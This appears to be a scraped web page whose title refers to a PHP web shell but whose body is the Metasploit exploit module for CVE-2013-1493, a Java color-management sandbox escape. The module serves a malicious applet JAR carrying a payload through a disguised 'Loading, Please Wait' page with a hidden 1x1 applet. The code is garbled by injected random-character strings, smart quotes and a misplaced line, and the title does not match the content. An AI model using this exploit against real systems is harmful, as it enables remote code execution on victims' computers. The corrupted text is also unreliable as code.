STUNSHELL PHP Web Shell远程执行代码

admin

##

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
/ ]" @* h% [9 E! k, s1 d1 }# web site for more information on licensing and terms of use.
# http://metasploit.com/
- [# f, P. {3 ~4 Q- x##
require ‘msf/core’
) d; @) X6 a2 Q2 l. q: [require ‘rex’
" [9 C3 |5 J0 y. yclass Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
$ }0 Q* i# ^' z; q5 jinclude Msf::Exploit::Remote::HttpServer::HTML
/ \1 f% L$ y3 q7 ~include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
def initialize( info = {} )
1 K# U- e/ ]5 O- [' V( X; Ysuper( update_info( info,
' d) V+ m* ~/ U  u+ Y) o* K" P‘Name’ => ‘Java CMM Remote Code Execution’,
/ z* O" b8 q$ o# H7 C‘Description’ => %q{
This module abuses the Color Management classes from a Java Applet to run
; ~, m: U( i! ^; [/ j* g  Larbitrary Java code outside of the sandbox as exploited in the wild in February
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
6 \1 c4 j+ L, J' N) \2 T' A5 mand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
- n% g1 q( G, gsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
warning in order to run the malicious applet.
},
‘License’ => MSF_LICENSE,
& M: H. o" r3 [5 f‘Author’ =>
'Unknown', # Vulnerability discovery and Exploit
( G+ R8 W+ E! {: O'juan vazquez' # Metasploit module (just ported the published exploit)
],
3 r( R: ?5 @" X* L9 Q- b: i# G- B‘References’ =>
$ X! ^" D7 v7 ~[
. @& i3 E! T6 ?5 l( [[ 'CVE', '2013-1493' ],
[ 'OSVDB', '90737' ],
; X1 ~$ u2 W/ \[ 'BID', '58238' ],
# V" m% M4 j% w[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
: D' G$ a3 v. X: f: I, \1 J1 T% f[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
[ 'URL', 'http://pastie.org/pastes/6581034' ]
7 Y. T) ?$ s4 V, n],
‘Platform’ => [ 'win', 'java' ],
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
8 G0 [8 |7 n6 s! n! r2 ?‘Targets’ =>
' d2 U7 m& i* x7 I[
[ 'Generic (Java Payload)',
7 g6 P6 g* O: y* V{
4 t- g& c" P; N. W0 q0 J'Platform' => 'java',
8 n0 P3 D5 H/ K- C) B'Arch' => ARCH_JAVA
}
9 j- U0 t* x- R3 b" G* i. a  B],
[ 'Windows x86 (Native Payload)',
0 `# P1 ?7 B0 b% m- P; C2 r* m{
'Platform' => 'win',
'Arch' => ARCH_X86
}
9 w! Z6 ?& @9 G, j]
],
‘‘DisclosureDate’ => ‘Mar 01 2013′
+ p( I. [) N% C/ ~9 g3 V1 y6 G))
end
% Y; ]3 M0 s/ p% L2 d0 s8 fdef setup
% f7 @+ i& J7 A' n. kpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
4 z+ G$ E/ o4 U/ |! Gpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
! q3 P$ ?" L$ t  L4 v@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
4 \7 _6 `3 G! o( mpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
; x# X) z" n, ^& x, r) Y@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
; l" ~, B. A8 z2 {* R- [5 Y@init_class_name = rand_text_alpha(“Init”.length)
% N8 o# J5 `5 k' x5 Y2 |- u@init_class.gsub!(“Init”, @init_class_name)
super
) U) u( K! I) rend
# V) e$ O  _& u/ |) M$ o% ?5 Ldef on_request_uri(cli, request)
print_status(“handling request for #{request.uri}”)
: s3 I( h0 N/ C' ~& acase request.uri
5 ^8 d. }) n, Fwhen /\.jar$/i
  D( {. a: T/ t' D5 O; ~. xjar = payload.encoded_jar
jar.add_file(“#{@init_class_name}.class”, @init_class)
jar.add_file(“Leak.class”, @leak_class)
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
! g1 r. q9 ]9 x+ ]; V/ i5 Xjar.add_file(“MyColorSpace.class”, @color_space_class)
$ k( `( U4 m! T$ X* f0 bDefaultTarget’ => 1,
' N) V2 ?6 t: s/ o. u' F9 Dmetasploit_str = rand_text_alpha(“metasploit”.length)
9 l: k; ?! w; p! `( hpayload_str = rand_text_alpha(“payload”.length)
7 h% r- o2 B: H( W2 x' ujar.entries.each { |entry|
( I5 Z6 I2 D- x4 a- Qentry.name.gsub!(“metasploit”, metasploit_str)
1 y% c8 ]0 c5 B: R* jentry.name.gsub!(“Payload”, payload_str)
& |: d1 _# N+ u* h2 i; F$ S2 Pentry.data = entry.data.gsub(“metasploit”, metasploit_str)
. A- R+ S% i# V# F0 z& w" @entry.data = entry.data.gsub(“Payload”, payload_str)
( t  d2 W5 \- k, T2 P3 n0 I}
jar.build_manifest
2 d0 `; G1 ?, M! A: x1 S# zsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
- h4 R4 ~  z. d  A4 lwhen /\/$/
payload = regenerate_payload(cli)
if not payload
print_error(“Failed to generate the payload.”)
" R7 \- ^7 F6 Q4 f7 S9 j; qsend_not_found(cli)
return
0 A, f2 u. {. j; Lend
8 K# E( z, _* f2 Y; `, ?send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
5 Z: ]  i" l. Gelse
' ]' V: r. t9 V- d0 a: ssend_redirect(cli, get_resource() + ‘/’, ”)
# o) n3 q: J2 S$ k+ cend
6 y% @% }8 V2 F* J8 j4 K- ^end
7 N0 W+ b; f5 R0 b* }# `- u8 Xdef generate_html
4 F( }6 ?" d. Z; ahtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
# `/ W! j5 [( \3 \; U3 ]( r& Z4 R- Phtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
html += %Q|</applet></body></html>|
8 H+ ^9 c0 {* G% S/ P6 r  Greturn html
# b* u+ C5 o! a3 r: b  U) t8 [1 hend
end
end